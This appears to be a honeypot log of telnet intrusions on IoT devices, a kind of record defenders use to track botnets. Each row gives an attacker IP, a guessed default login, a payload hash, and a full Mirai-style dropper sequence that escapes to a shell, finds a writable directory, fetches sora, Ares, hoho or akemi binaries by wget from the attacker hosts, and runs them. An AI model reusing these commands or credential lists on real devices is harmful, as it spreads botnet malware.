| IP address |
User name |
Password |
SHA256 of the payload file |
 102.165.37.59
| fliruser | 3vlig | c078ef665a88cead97cd35075ae44523db1e247269ca020ca4f55eb22c42c960 |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf DestoryTheNet dropper
/bin/busybox cp /bin/busybox DestoryTheNet; >DestoryTheNet; /bin/busybox chmod 777 DestoryTheNet; /bin/busybox SORA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox SORA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA
/bin/busybox wget http://102.165.37.59:80/bins/sora.mpsl -O - > DestoryTheNet; /bin/busybox chmod 777 DestoryTheNet; /bin/busybox SORA
./DestoryTheNet telnet.loader.mpsl; /bin/busybox BIGREP
/bin/busybox rm -rf dropper; >DestoryTheNet; /bin/busybox SORA |
 89.35.39.74
| ecurity | ecurity | ee5082f566a5e75068e90799c1e00f09ddea4b5a961715b03f6c8ba4b7b32eba |
enable
system
shell
sh
linuxshell
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf .updater aresupdater
/bin/busybox cp /bin/busybox .updater; >.updater; /bin/busybox chmod 777 .updater; /bin/busybox DARK
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox DARK
/bin/busybox cat /proc/cpuinfo || while read i; do echo $i; done < /proc/cpuinfo; /bin/busybox DARK
/bin/busybox wget; /bin/busybox tftp; /bin/busybox DARK
/bin/busybox wget http://89.35.39.74:80/33bi/Ares.arm -O - > .updater; /bin/busybox chmod 777 .updater; /bin/busybox DARK
./.updater telnet; /bin/busybox ARES
/bin/busybox rm -rf aresupdater .updater
/bin/busybox cp /bin/busybox .updater; >.updater; /bin/busybox chmod 777 .updater; /bin/busybox DARK
/bin/busybox wget; /bin/busybox tftp; /bin/busybox DARK
/bin/busybox wget http://89.35.39.74:80/33bi/Ares.arm7 -O - > .updater; /bin/busybox chmod 777 .updater; /bin/busybox DARK
./.updater telnet; /bin/busybox ARES
/bin/busybox rm -rf aresupdater; >.updater; /bin/busybox DARK |
 5.135.125.203
| default | S2fGqNFs | 43f2944394dca1053bd5d7d73916c2f33bb4ec5b2ac9c94e5b3b0b9ab010fddd |
enable
system
linuxshell
shell
sh
>/tmp/.misa && cd /tmp/
>/var/.misa && cd /var/
>/dev/.misa && cd /dev/
>/mnt/.misa && cd /mnt/
>/var/run/.misa && cd /var/run/
>/var/tmp/.misa && cd /var/tmp/
>/.misa && cd /
>/dev/netslink/.misa && cd /dev/netslink/
>/dev/shm/.misa && cd /dev/shm/
>/bin/.misa && cd /bin/
>/etc/.misa && cd /etc/
>/boot/.misa && cd /boot/
>/usr/.misa && cd /usr/
/bin/busybox rm -rf HOHO-U79OL HOHO-9Y8G6
/bin/busybox cp /bin/busybox HOHO-U79OL; >HOHO-U79OL; /bin/busybox chmod 777 HOHO-U79OL; /bin/busybox HOHO
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox HOHO
/bin/busybox cat /proc/cpuinfo || while read i; do echo $i; done < /proc/cpuinfo; /bin/busybox HOHO
/bin/busybox wget; /bin/busybox tftp; /bin/busybox HOHO
/bin/busybox wget http://5.135.125.203:80/bins/hoho.arm -O - > HOHO-U79OL; /bin/busybox chmod 777 HOHO-U79OL; /bin/busybox HOHO
./HOHO-U79OL telnet; /bin/busybox BOTNET
/bin/busybox rm -rf HOHO-9Y8G6 HOHO-U79OL
/bin/busybox cp /bin/busybox HOHO-U79OL; >HOHO-U79OL; /bin/busybox chmod 777 HOHO-U79OL; /bin/busybox HOHO
/bin/busybox wget; /bin/busybox tftp; /bin/busybox HOHO
/bin/busybox wget http://5.135.125.203:80/bins/hoho.arm7 -O - > HOHO-U79OL; /bin/busybox chmod 777 HOHO-U79OL; /bin/busybox HOHO
./HOHO-U79OL telnet; /bin/busybox BOTNET
/bin/busybox rm -rf HOHO-9Y8G6; >HOHO-U79OL; /bin/busybox HOHO |
102.165.37.59 | super | juniper123 | 0c3932c7f4ed727ce6b1c8ffee7b723e92378324b886f3e2c463947a217fd23a |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf DestoryTheNet dropper
/bin/busybox cp /bin/busybox DestoryTheNet; >DestoryTheNet; /bin/busybox chmod 777 DestoryTheNet; /bin/busybox SORA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox SORA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA
/bin/busybox wget http://102.165.37.59:80/bins/sora.mips -O - > DestoryTheNet; /bin/busybox chmod 777 DestoryTheNet; /bin/busybox SORA
./DestoryTheNet telnet.loader.mips; /bin/busybox BIGREP
/bin/busybox rm -rf dropper; >DestoryTheNet; /bin/busybox SORA |
102.165.37.59 | admin | 888888 | 686e75e6adfd0ae8f954af77b5aa6cd17f87cbf8c834e9bde081af6914e0a0b2 |
enable
system
shell
sh
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf DestoryTheNet dropper
/bin/busybox cp /bin/busybox DestoryTheNet; >DestoryTheNet; /bin/busybox chmod 777 DestoryTheNet; /bin/busybox SORA
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox SORA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SORA
/bin/busybox wget http://102.165.37.59:80/bins/sora.m68k -O - > DestoryTheNet; /bin/busybox chmod 777 DestoryTheNet; /bin/busybox SORA
./DestoryTheNet telnet.loader.m68k; /bin/busybox BIGREP
/bin/busybox rm -rf dropper; >DestoryTheNet; /bin/busybox SORA |
 23.254.225.71
| root | 1234qwer | f65a7ed236684fdd92b44fc6ac8d3fef0a1fb5e7aee69bcffaf385ece8f3c774 |
linuxshell
sh
shell
enable
system
hostname AKEMI_0661
/bin/busybox AKEMI
/bin/busybox ps; /bin/busybox AKEMI
/bin/busybox cat /proc/mounts; /bin/busybox AKEMI
/bin/busybox echo -e '\x6a\x61\x73\x69/proc' > /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon
/bin/busybox echo -e '\x6a\x61\x73\x69/sys' > /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon
/bin/busybox echo -e '\x6a\x61\x73\x69/tmp' > /tmp/.nippon; /bin/busybox cat /tmp/.nippon; /bin/busybox rm /tmp/.nippon
/bin/busybox echo -e '\x6a\x61\x73\x69/overlay' > /overlay/.nippon; /bin/busybox cat /overlay/.nippon; /bin/busybox rm /overlay/.nippon
/bin/busybox echo -e '\x6a\x61\x73\x69' > /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon
/bin/busybox echo -e '\x6a\x61\x73\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox echo -e '\x6a\x61\x73\x69/dev/pts' > /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon
/bin/busybox echo -e '\x6a\x61\x73\x69/sys/kernel/debug' > /sys/kernel/debug/.nippon; /bin/busybox cat /sys/kernel/debug/.nippon; /bin/busybox rm /sys/kernel/debug/.nippon
/bin/busybox echo -e '\x6a\x61\x73\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox AKEMI
cd /
/bin/busybox cp /bin/echo akemiakemi; >akemiakemi; /bin/busybox chmod 777 akemiakemi; /bin/busybox AKEMI
/bin/busybox cat /bin/echo
/bin/busybox AKEMI
cat /proc/cpuinfo; uname -m; /bin/busybox AKEMI
/bin/busybox wget; /bin/busybox tftp; /bin/busybox AKEMI
/bin/busybox wget http://23.254.225.71:80/bins/akemi.arm -O - > akemiakemi; /bin/busybox chmod 777 akemiakemi; /bin/busybox AKEMI
./akemiakemi arm; /bin/busybox IMEKA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox AKEMI
/bin/busybox wget http://23.254.225.71:80/bins/akemi.arm7 -O - > akemiakemi; /bin/busybox chmod 777 akemiakemi; /bin/busybox AKEMI
./akemiakemi arm7; /bin/busybox IMEKA
/bin/busybox AKEMI |
167.71.200.228 | admin | admin | a4b4e3d14c71c0d578328da86c4527869ce0b6511952afa7a1d842fc2164910c |
sh
..
linuxshell
shell
enable
system
hostname SEFA_ID:4763
/bin/busybox SEFA
/bin/busybox ps; /bin/busybox SEFA
/bin/busybox cat /proc/mounts; /bin/busybox SEFA
/bin/busybox echo -e '\x6b\x61\x6d\x69/proc' > /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm /proc/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/sys' > /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm /sys/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/tmp' > /tmp/.nippon; /bin/busybox cat /tmp/.nippon; /bin/busybox rm /tmp/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/overlay' > /overlay/.nippon; /bin/busybox cat /overlay/.nippon; /bin/busybox rm /overlay/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69' > /.nippon; /bin/busybox cat /.nippon; /bin/busybox rm /.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev/pts' > /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm /dev/pts/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/sys/kernel/debug' > /sys/kernel/debug/.nippon; /bin/busybox cat /sys/kernel/debug/.nippon; /bin/busybox rm /sys/kernel/debug/.nippon
/bin/busybox echo -e '\x6b\x61\x6d\x69/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm /dev/.nippon
/bin/busybox SEFA
cd /
/bin/busybox cp /bin/echo sefaexecbi; >sefaexecbi; /bin/busybox chmod 777 sefaexecbi; /bin/busybox SEFA
/bin/busybox cat /bin/echo
/bin/busybox SEFA
/bin/busybox wget; /bin/busybox tftp; /bin/busybox SEFA
/bin/busybox wget http://167.71.200.228:80/bins/hoho.mips -O - > sefaexecbi; /bin/busybox chmod 777 sefaexecbi; /bin/busybox SEFA
./sefaexecbi mips; /bin/busybox AFES
/bin/busybox SEFA |
89.35.39.74 | root | 88888888 | b3057b4a4e4230baa55f439895b61620a0fdfb91d018dfcdfa2b173c28d5f379 |
enable
system
shell
sh
linuxshell
>/tmp/.ptmx && cd /tmp/
>/var/.ptmx && cd /var/
>/dev/.ptmx && cd /dev/
>/mnt/.ptmx && cd /mnt/
>/var/run/.ptmx && cd /var/run/
>/var/tmp/.ptmx && cd /var/tmp/
>/.ptmx && cd /
>/dev/netslink/.ptmx && cd /dev/netslink/
>/dev/shm/.ptmx && cd /dev/shm/
>/bin/.ptmx && cd /bin/
>/etc/.ptmx && cd /etc/
>/boot/.ptmx && cd /boot/
>/usr/.ptmx && cd /usr/
/bin/busybox rm -rf .updater aresupdater
/bin/busybox cp /bin/busybox .updater; >.updater; /bin/busybox chmod 777 .updater; /bin/busybox DARK
/bin/busybox cat /bin/busybox || while read i; do echo $i; done < /bin/busybox
/bin/busybox DARK
/bin/busybox wget; /bin/busybox tftp; /bin/busybox DARK
/bin/busybox wget http://89.35.39.74:80/33bi/Ares.mips -O - > .updater; /bin/busybox chmod 777 .updater; /bin/busybox DARK
./.updater telnet; /bin/busybox ARES
/bin/busybox rm -rf aresupdater; >.updater; /bin/busybox DARK |